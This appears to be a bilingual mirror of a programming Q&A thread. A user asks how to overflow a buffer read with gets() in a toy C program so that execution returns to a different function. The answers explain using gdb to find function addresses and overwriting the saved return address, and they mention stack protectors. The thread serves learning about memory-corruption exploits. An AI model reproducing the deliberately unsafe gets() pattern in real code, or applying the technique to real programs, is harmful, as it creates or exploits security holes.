缓冲区溢出漏洞利用更改函数调用
[英]buffer overflow exploit change function call
问题描述
I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? 
我正在尝试执行缓冲区溢出,以将调用从功能A更改为功能B。这可行吗? I know I will have to figure out how many bytes I have to enter until I have control over the return pointer, and figure out the address of function B. Is it possible to alter it so that after "x==10" we inject function B's address instead of functionA? 我知道我将必须弄清楚必须输入多少字节,直到可以控制返回指针,然后弄清楚函数B的地址。是否可以更改它,以便在“ x == 10”之后注入功能B的地址而不是功能A? Edit: Is it possible that after fillbuff is called, instead of returning to main, we send it to function B? 编辑:是否有可能在调用fillbuff之后,而不是返回到main,而是将其发送给函数B? Any hints is appreciated. 任何提示表示赞赏。
int fillBuff(int x){
char buff[15];
puts("Enter your name");
gets(buff);
return(x + 5);
}
void functionA(){
puts("I dont want to be here");
exit(0);
}
void functionB(){
printf("I made it!");
exit(0);
}
int main(){
int x;
x = fillbuff(5);
if (x == 10){
functionA();
}
}
2 个解决方案
解决方案1
2 已采纳 2015-11-20 03:51:16
Here is an article that shows how to do it: http://insecure.org/stf/smashstack.html . 这是一篇展示如何执行此操作的文章: http : //insecure.org/stf/smashstack.html 。
Compile your program like this: gcc -g -c program.c (with the -g ) and run gdb ./a.out . 像这样编译程序: gcc -g -c program.c (带有-g )并运行gdb ./a.out 。 After, run the command disas main . 之后,运行命令disas main 。 You should see the disassemble of your code and how it is organized in your memory. 您应该看到代码的反汇编及其在内存中的组织方式。 You can replace the main function to any other function and see its code. 您可以将main函数替换为任何其他函数,并查看其代码。 For more information about disassemble see: https://sourceware.org/gdb/onlinedocs/gdb/Machine-Code.html 有关反汇编的更多信息,请参见: https : //sourceware.org/gdb/onlinedocs/gdb/Machine-Code.html
Running GDB and disassembling the functions on my computer, the address of functionA() is 0x400679 and the address of functionB() is 40068a . 运行GDB并反汇编我计算机上的功能, functionA()的地址为0x400679 ,而functionB()的地址为40068a 。 If you see the disassemble code of main function, there is a call to the address 0x400679 , and what you want is to change it to 40068a . 如果看到主功能的反汇编代码,则有一个对地址0x400679的调用,您想要将其更改为40068a 。 Basically, you have to overflow the buffer in function fillBuff and after reaching the space of the pointer, you have to fill with the address. 基本上,您必须使函数fillBuff的缓冲区溢出,并且在到达指针的空间后,必须填充地址。 The article shows how to do it. 本文介绍了如何做到这一点。
解决方案2
0 2015-11-20 03:49:41
Buffer overflows are undefined behavior in C. Nothing is guaranteed to occur when you buffer overflow, and as far as I'm aware the language doesn't require a specific memory layout for local variables and/or stored return addresses. 缓冲区溢出是C语言中未定义的行为。保证缓冲区溢出时不会发生任何事情,据我所知,该语言不需要局部变量和/或存储的返回地址的特定内存布局。 In addition to this, some compilers insert stack protectors to make buffer overflow attacks more difficult. 除此之外,某些编译器会插入堆栈保护程序,以使缓冲区溢出攻击更加困难。
If you want to have defined behavior, you are going to need to look at the assembly produced and figure out what a buffer overflow is going to do. 如果要定义行为,则需要查看生成的程序集,并弄清楚缓冲区溢出将要做什么。 Based on the assembly produced, you can determine the stack layout and the address layout and try to overwrite the return address with a different function's address. 根据生成的程序集,您可以确定堆栈布局和地址布局,并尝试使用其他函数的地址覆盖返回地址。
If you're using GCC, the command line option to print out the assembly is -Wa,-al . 如果使用的是GCC,则打印出程序集的命令行选项为-Wa,-al 。 If you want Intel syntax, add -masm=intel . 如果需要Intel语法,请添加-masm=intel 。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.